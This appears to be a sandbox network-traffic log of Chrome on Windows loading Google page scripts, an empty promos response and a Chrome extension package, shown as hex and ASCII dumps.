2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 33 64 5c 22 74 72 75 65 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 5c 75 30 30 33 64 5c 22 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 77 61 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 20 61 70 70 73 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 65 6e 2d 47 42 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 5c 75 30 30 33 64 72 68 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 Data Ascii: 3d\"true\" data-ogsr-alt\u003d\"\" id\u003d\"gbwa\"\u003e\u003cdiv class\u003d\"gb_D\"\u003e\u003ca class\u003d\"gb_B\" aria-label\u003d\"Google apps\" href\u003d\"https://www.google.com/intl/en-GB/about/products?tab\u003drh\" aria-expanded\u003d\"false\"
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 35 64 20 67 62 5f 46 63 20 67 62 5f 38 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 50 64 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 Data Ascii: 3e\u003cdiv class\u003d\"gb_Dc\"\u003e\u003cdiv class\u003d\"gb_Ec\"\u003e\u003ca class\u003d\"gb_5d gb_Fc gb_8d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Pd gb_7d\" aria-hidden\u003d\"true\" role\u003d\"pres
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 49 64 3b 49 64 5c 75 30 30 33 64 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 5f 2e 72 64 7b 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 Data Ascii: u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}catch(e){_._DumpException(e)}\ntry{\nvar Id;Id\u003dclass extends _.rd{};_.Jd\u003dfunction(
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 57 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 57 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 59 64 5c 75 30 30 33 64 5c 75 30 30 33 Data Ascii: stIndexOf(b,0)\u003d\u003d0};Xd\u003dfunction(){let a\u003dnull;if(!Wd)return a;try{const b\u003dc\u003d\u003ec;a\u003dWd.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Zd\u003dfunction(){Yd\u003d\u003
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c Data Ascii: ion(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 5f 2e 4c 64 28 66 29 3a 66 2c 64 29 7d 7d 3b 5c 6e 5f 2e 74 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 71 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 71 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 Data Ascii: 3d\"function\"?_.Ld(f):f,d)}};\n_.te\u003dfunction(a){return _.qe(document,a)};_.qe\u003dfunction(a,b){b\u003dString(b);a.contentType\u003d\u003d\u003d\"application/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.ue\u003dfunct
2025-06-19 10:58:55 UTC	1460	IN	Data Raw: 64 5c 75 30 30 33 64 76 6f 69 64 20 30 3f 28 7a 65 7c 7c 28 7a 65 5c 75 30 30 33 64 7b 61 74 6f 6d 69 63 3a 21 31 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3a 5c 22 6e 6f 6e 65 5c 22 2c 64 72 6f 70 65 66 66 65 63 74 3a 5c 22 6e 6f 6e 65 5c 22 2c 68 61 73 70 6f 70 75 70 3a 21 31 2c 6c 69 76 65 3a 5c 22 6f 66 66 5c 22 2c 6d 75 6c 74 69 6c 69 6e 65 3a 21 31 2c 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3a 21 31 2c 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 5c 22 76 65 72 74 69 63 61 6c 5c 22 2c 72 65 61 64 6f 6e 6c 79 3a 21 31 2c 72 65 6c 65 76 61 6e 74 3a 5c 22 61 64 64 69 74 69 6f 6e 73 20 74 65 78 74 5c 22 2c 72 65 71 75 69 72 65 64 3a 21 31 2c 73 6f 72 74 3a 5c 22 6e 6f 6e 65 5c 22 2c 62 75 73 79 3a 21 31 2c 64 69 73 61 62 6c 65 64 3a 21 31 2c 68 69 64 64 65 6e Data Ascii: d\u003dvoid 0?(ze\|\|(ze\u003d{atomic:!1,autocomplete:\"none\",dropeffect:\"none\",haspopup:!1,live:\"off\",multiline:!1,multiselectable:!1,orientation:\"vertical\",readonly:!1,relevant:\"additions text\",required:!1,sort:\"none\",busy:!1,disabled:!1,hidden

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49701	142.250.80.100	443	7808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:55 UTC	384	OUT	GET /async/newtab_promos HTTP/1.1 host: www.google.com sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: empty sec-fetch-storage-access: active user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=4, i
2025-06-19 10:58:55 UTC	943	IN	HTTP/1.1 200 OK version: 772435172 content-type: application/json; charset=UTF-8 x-content-type-options: nosniff cross-origin-opener-policy: same-origin-allow-popups; report-to="gws" report-to: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} accept-ch: Downlink accept-ch: RTT accept-ch: Sec-CH-UA-Form-Factors accept-ch: Sec-CH-UA-Platform accept-ch: Sec-CH-UA-Platform-Version accept-ch: Sec-CH-UA-Full-Version accept-ch: Sec-CH-UA-Arch accept-ch: Sec-CH-UA-Model accept-ch: Sec-CH-UA-Bitness accept-ch: Sec-CH-UA-Full-Version-List accept-ch: Sec-CH-UA-WoW64 permissions-policy: unload=() content-disposition: attachment; filename="f.txt" date: Thu, 19 Jun 2025 10:58:55 GMT server: gws x-xss-protection: 0 x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 accept-ranges: none vary: Accept-Encoding content-length: 29
2025-06-19 10:58:55 UTC	29	IN	Data Raw: 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d Data Ascii: )]}'{"update":{"promos":{}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49702	142.251.40.225	443	7808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:56 UTC	563	OUT	GET /crx/blobs/AcpJF5ho5qiteKFlOs9oa2OJ5wVzn8EE7yew0YGDDHuvWChMYrZS4bCh0dkVxyA3d7kOiYDYNiJkNeWb1tzHXkpyUJzzBlbDFwd4gjnQ5xHGSJZLAPXPo1r4yItWjektITcTAMZSmuWaL_vnnTTF3x3QBb5BkCr-MJha2g/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_6_1_4.crx HTTP/1.1 host: clients2.googleusercontent.com sec-fetch-site: none sec-fetch-mode: no-cors sec-fetch-dest: empty user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=1, i
2025-06-19 10:58:56 UTC	552	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABgVH89dfDV2x67UFcQQhJy7yB0YnRu7f8nYMYxpCmoHiwstCAA5qrFups27PsdJijrHPVU9ftWYm7Q accept-ranges: bytes content-length: 2860497 x-goog-hash: crc32c=ECwwOg== server: UploadServer date: Wed, 18 Jun 2025 13:54:22 GMT expires: Thu, 18 Jun 2026 13:54:22 GMT cache-control: public, max-age=31536000 last-modified: Mon, 16 Jun 2025 15:25:05 GMT etag: 52c2d18d_02ae7332_ff562c36_33bb10e9_12e42e2e content-type: application/x-chrome-extension age: 75873 alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 43 72 32 34 03 00 00 00 18 04 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d Data Ascii: Cr240"0H0\7c<Fto82'5qk%2CF9#exQ[L\|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k\|1n<FbfQ1s2{*6PpobM
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: a0 f2 18 c1 79 e6 ff dd 32 23 8f ec 3f 2c 28 04 ac c9 f6 96 b3 85 b1 a2 70 d6 06 46 79 64 52 bd 57 67 39 1c 46 4f d2 24 1b d9 d6 e8 49 45 d3 02 03 4b d2 1a 2d ec ad 61 61 ac 87 98 e2 e8 29 b2 66 e0 56 d5 5c 32 11 31 ca 95 27 37 b7 de d5 af 18 c7 5a df 6c 14 a3 2c e3 fb 93 ae 11 db 60 77 13 81 56 a4 0d 94 7a 3a 02 1e e3 a0 3c 35 11 82 57 13 91 e7 05 ff 0c 95 a1 78 fc b1 47 df 66 d7 f9 07 7e d8 b5 fc 31 88 e9 b8 e8 b3 cf a1 b1 6d 70 22 6a b6 cd a0 18 88 8a d2 bb 23 7f fb c5 63 28 0e 84 47 9e 05 ee ec ca 76 e7 7e 70 c6 bd 24 1c 1b b2 df a1 f2 b8 fd 93 40 85 50 c8 13 88 57 62 28 18 f1 67 2c ba b5 47 33 11 21 b6 dc 84 0a 31 8a 62 2a 46 e3 a2 3f e3 b8 74 ba 05 65 64 08 13 d1 f1 64 5a 65 49 52 f6 4c 50 f2 45 d3 61 38 1b cf 7a 14 4c 40 50 2d 77 7c b4 3e d4 85 a9 Data Ascii: y2#?,(pFydRWg9FO$IEK-aa)fV\21'7Zl,`wVz:<5WxGf~1mp"j#c(Gv~p$@PWb(g,G3!1b*F?teddZeIRLPEa8zL@P-w\|>
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 69 65 77 65 72 2e 68 74 6d 6c 55 54 05 00 01 f6 cc 50 68 0a 00 20 00 00 00 00 00 01 00 18 00 00 1f cd 07 2c df db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 54 c1 6e db 38 10 bd fb 2b a6 3a 16 96 e4 0d 50 a0 cd 5a 01 bc 8e 0b 18 28 92 a2 4d 80 ee 69 41 93 63 69 5a 8a 54 c9 b1 1d b5 e8 bf ef 50 72 dc 78 03 14 7b 28 7d 30 c9 99 79 f3 f8 1e a9 f9 8b eb db e5 dd df ef 57 d0 70 6b af 26 f3 17 79 3e 29 5f fe ae 31 91 1f 2c ae 6f ff 5a c1 f2 f6 e6 ed fa 7a 75 73 b7 5e bc 93 cd 7f 9e 8f 21 19 96 be eb 03 d5 0d c3 c5 ec 62 06 0b e3 37 08 1f fb c8 d8 46 58 3b ed 43 e7 83 62 34 29 79 61 2d 7c 48 c9 11 3e 60 c4 b0 47 53 0c 30 37 b7 77 eb e5 ea 72 cc 20 b7 f5 a1 55 4c de 81 f6 8e 15 39 34 d0 60 40 72 40 71 0a ca 19 08 d8 ca 7e 94 5a 6e 10 ba e0 3b 0c dc 83 Data Ascii: iewer.htmlUTPh ,Tn8+:PZ(MiAciZTPrx{(}0yWpk&y>)_1,oZzus^!b7FX;Cb4)ya-\|H>`GS07wr UL94`@r@q~Zn;
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: ad 38 a3 05 33 83 85 cd e8 fc 62 73 31 b5 8e 52 94 55 b9 c1 30 b6 cd f1 4b 6b 09 96 30 b8 46 ee 78 b6 dd e8 6b 7b 87 77 79 9a ed 4c 29 23 c6 8f be 73 8c 95 73 ec ef 55 be bb d5 fb 65 c3 c7 ee 77 0c ce e8 4c 8d ee 81 9e e4 32 7a 05 94 7b 36 2c 28 6f 1f e9 95 6c c3 26 71 1e 29 a2 0d 27 a9 1d c2 1b d6 19 f9 df 51 a5 29 0b 84 18 51 35 9a 60 30 dd 14 58 91 04 c2 a6 35 bf 8d de 13 3e be f9 37 99 99 6b e3 12 2e 83 39 a3 4a f7 d6 32 b6 ae 6a 98 68 22 60 2e 05 96 f3 40 1d a4 98 91 24 21 09 dc 7d 6a 74 ed 7f 7c bc 7a 77 27 aa 38 ff 28 28 d7 56 e3 6d b8 c6 f5 ac de 8d 2f 6f ed b5 2c 0f 32 cb 35 a3 19 9d 51 46 f5 72 ea 68 bd bf 7d b4 96 74 56 19 23 3d 75 46 63 0e 87 55 93 09 06 d2 4f fe 30 77 a5 bd d3 fb 79 96 fb 6d 1d 2c 18 9a 47 6d 74 20 8e f2 7b b8 9c 2e cd 74 e5 Data Ascii: 83bs1RU0Kk0Fxk{wyL)#ssUewL2z{6,(ol&q)'Q)Q5`0X5>7k.9J2jh"`.@$!}jt\|zw'8((Vm/o,25QFrh}tV#=uFcUO0wym,Gmt {.t
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: b5 8d 8a f6 1b a5 5c 28 38 7a bb 9e 3c 6e c6 ca f5 56 ba 37 95 98 ed 46 e6 d4 84 f1 cb e6 13 aa 99 10 73 93 b3 78 e7 fe 72 f2 ed 2f 50 4b 07 08 7a ff 86 28 12 08 00 00 bc 2a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 2d 00 73 63 68 65 6d 61 2e 6a 73 6f 6e 55 54 05 00 01 f6 cc 50 68 0a 00 20 00 00 00 00 00 01 00 18 00 00 1f cd 07 2c df db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 90 cd 4e c3 30 10 84 ef 79 8a 55 2e 5c 2a 7a e7 56 09 89 f6 80 40 a2 3c 80 93 ac 13 23 d7 6b d9 6b 95 a8 ea bb 63 3b 21 fd 51 10 39 f8 32 3b b3 3b 9f 4f 05 40 c9 bd c5 f2 09 4a aa be b0 e6 72 95 34 eb c8 a2 63 85 3e 4e 4e 51 89 da 9b 45 b3 45 6d bf 27 29 85 15 eb 9c 4e 53 e8 d2 18 58 54 8f 79 4d 76 34 e8 6b a7 2c 2b 32 c9 Data Ascii: \(8z<nV7Fsxr/PKz(PK!-schema.jsonUTPh ,N0yU.\zV@<#kkc;!Q92;;O@Jr4c>NNQEEm')NSXTyMv4k,+2
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 5d dd 1d 31 72 29 f8 0a c9 e5 bf 36 4d 84 df f8 03 cf fb 1f 86 2e e9 88 be db 6a 38 0e d2 ff 70 50 f3 d3 29 92 94 73 d9 c8 8b de 11 b1 3b dc 09 f3 c0 83 ea da 26 02 51 5f b5 84 ee 2e 0f fb 45 a9 11 8f 2b 95 b3 02 c6 ba 70 37 bb ce f0 68 f3 70 34 07 19 2e 72 5e 32 c9 d1 65 eb 76 37 3a 42 38 3c 40 35 e9 11 c9 19 c6 59 b7 14 44 db 7f d2 9f b7 b7 8e 06 b9 85 44 b9 3d ff 16 ce ad 2d c3 c4 7d 18 7c 4e dd b7 29 52 1a 1f 93 42 4d f0 81 d8 b3 fa d0 b8 89 43 67 5a 2c 79 78 7f 66 f5 fa d1 33 eb 9d 67 73 88 e4 a9 ae a4 15 f8 9c 71 fb f9 ee 32 0a 4f c3 f8 ac 75 a5 64 4f 49 89 24 4a 59 9e 6f 7d 15 45 ea fc 4f cf ec 9b 49 6c 22 ef cf 55 2a 19 e0 06 33 dd 46 e1 18 8c c2 9d 9b c2 f3 f3 73 f3 e6 4d a4 d2 5d af 3f e4 16 c5 60 b7 89 e3 a4 16 6e 51 0f a9 e1 32 af d1 51 c9 b4 Data Ascii: ]1r)6M.j8pP)s;&Q_.E+p7hp4.r^2ev7:B8<@5YDD=-}\|N)RBMCgZ,yxf3gsq2OudOI$JYo}EOIl"U*3FsM]?`nQ2Q
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: ff 03 50 4b 07 08 0a f1 c5 86 e1 08 00 00 34 17 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 2d 00 73 69 67 6e 49 6e 48 61 6e 64 6c 65 72 2e 68 74 6d 6c 55 54 05 00 01 f6 cc 50 68 0a 00 20 00 00 00 00 00 01 00 18 00 00 1f cd 07 2c df db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 94 41 6f 1a 31 10 85 ef fc 8a c9 1e ab 2c 1b e5 58 41 24 0a 44 45 aa 20 4a e8 21 a7 ca d8 03 3b 91 d7 5e 8d 87 a0 ed af ef 78 97 22 a1 4a 51 0f 31 97 dd f1 bc 37 1f cf f2 4e 6e 16 9b f9 f6 f5 69 09 b5 34 fe 61 34 b9 29 cb 51 f5 e5 b3 d6 48 7f 30 5b 6c be 2d 61 be 59 3f ae 16 cb f5 76 35 fb a1 c5 5f ff ae be 19 e6 b1 ed 98 0e b5 c0 fd dd fd 1d cc 5c dc 21 bc 74 49 b0 49 b0 0a 36 72 1b d9 08 ba dc 3c f3 1e 9e 73 73 82 67 4c c8 Data Ascii: PK4PK!-signInHandler.htmlUTPh ,Ao1,XA$DE J!;^x"JQ17Nni4a4)QH0[l-aY?v5_\!tII6r<ssgL
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 6c 9d e2 ee 71 7e e1 d5 44 9b 7e dc 4d 10 d5 4b b3 1f 88 69 ae 1a 39 2f 1c 56 b8 9d aa d2 e8 be 82 89 d3 ae b9 53 30 67 07 38 f9 b8 10 06 06 4b 1a 1d 65 05 67 ae 52 c2 99 d0 52 83 73 11 45 dc 52 53 ec 6a 97 79 3b 1d 4b 74 64 3d a4 ba 03 13 8a fe 3e f2 2f 3e a1 69 ba 84 f7 c0 fa 9d a4 7d e1 73 6f 53 e2 b4 b3 e8 e2 a6 6d d4 7a c3 27 ee 52 f2 82 dc a0 04 1d 1c 1a 7a 24 c5 e5 a5 0b 01 f6 47 bc b7 3d 6b 2c b6 7b 0a f2 45 60 e8 38 e0 85 e7 b7 3e 3a 80 00 96 20 0c fa 81 20 ef 0f b1 82 83 51 92 c5 77 bd a4 33 8a b3 b8 f7 17 6e f3 81 e7 f9 32 e8 24 77 cf dd d1 63 de 49 2e 2f 75 00 62 c9 95 14 73 e4 a2 0a 13 28 fc 08 18 f7 c4 ee f9 70 fc 1a 9d 1c fa 9f 05 c6 fe c7 e0 2f 9f 84 db ad 2e 4f af b8 61 33 f7 dd b0 61 14 8b 43 99 92 63 6a 9c 50 d9 74 bc e0 16 b6 c9 bc 6d Data Ascii: lq~D~MKi9/VS0g8KegRRsERSjy;Ktd=>/>i}soSmz'Rz$G=k,{E`8>: Qw3n2$wcI./ubs(p/.Oa3aCcjPtm
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 30 76 fc 5d 8e 9e 10 b1 56 5c 9d 5f 2f ee c8 ab d6 3d 57 22 a3 10 ed ce 35 f6 5b 23 9b 20 02 d6 7e 11 2e d3 ee b3 df 7b 76 ec 1f 8b c5 27 d6 e5 1d b4 53 15 dc 90 90 50 61 de 19 b7 94 9d 92 d1 60 7c 45 0d 43 b0 74 40 74 37 24 79 b9 2f bb 1c 24 5d 06 c2 f6 e6 fe 5f cc fe 26 bd 36 11 db a9 4e c5 7d 37 84 dd 52 ec 2e af f3 2f b5 de 79 01 a2 b6 9d fe 0b 50 4b 07 08 1c d8 99 c0 d9 03 00 00 ee 07 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 17 00 2d 00 73 77 5f 6d 6f 64 75 6c 65 73 2f 66 6c 6f 6f 64 67 61 74 65 2e 6a 73 55 54 05 00 01 f6 cc 50 68 0a 00 20 00 00 00 00 00 01 00 18 00 00 1f cd 07 2c df db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 59 6d 6f db 38 12 fe be bf 42 11 0e 81 b4 ab 28 6d 77 7b b8 b3 e1 0d Data Ascii: 0v]V\_/=W"5[# ~.{v'SPa`\|ECt@t7$y/$]_&6N}7R./yPKPK!-sw_modules/floodgate.jsUTPh ,Ymo8B(mw{
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: b8 db 8d b8 31 fd de a7 02 89 69 22 92 d2 98 15 8b 32 4e e6 b8 dd 72 73 d5 2b b0 9d 86 08 0b 93 c0 4a 75 17 11 9b 2b 18 e9 6d 66 8d 81 8e f2 76 60 dd d1 de 16 42 9d 16 a4 f2 1c bb 83 43 6a 96 db 55 75 77 df d2 b5 c9 f1 b3 3d 10 c5 87 c3 77 6f ad 19 3b 20 a6 97 97 fd d1 d6 0d 7d 45 a6 bc d3 fb c6 9e 64 19 ed 49 2e d4 5f 75 e1 5e 84 bf bc 6c f2 ad 5f 75 f3 c2 61 c2 f6 63 cb be 43 93 a5 61 6e be 60 aa b0 e8 75 f4 36 50 52 23 d8 d9 75 b4 ce 41 e0 df 36 c8 e4 db 83 f6 7c 97 b1 07 a6 ea b0 00 e4 fd 02 0b 14 19 c4 34 45 94 b6 a1 bb 73 46 24 44 a2 e1 6b cd 4b b1 41 12 cf 04 12 90 17 f3 67 ab 64 c0 22 5c 29 39 29 ff ea 7a 3a e8 5f 5e 9e e9 d7 6e a7 c3 8f 48 6e 88 92 ee e6 f8 78 5f e8 cc 39 b4 b4 a4 b9 e9 9e bd ae db 79 6d a6 c1 5d 20 bc 2a 65 a2 3e eb 37 69 9a 4e Data Ascii: 1i"2Nrs+Ju+mfv`BCjUuw=wo; }EdI._u^l_uacCan`u6PR#uA6\|4EsF$DkKAgd"\)9)z:_^nHnx_9ym] *e>7iN
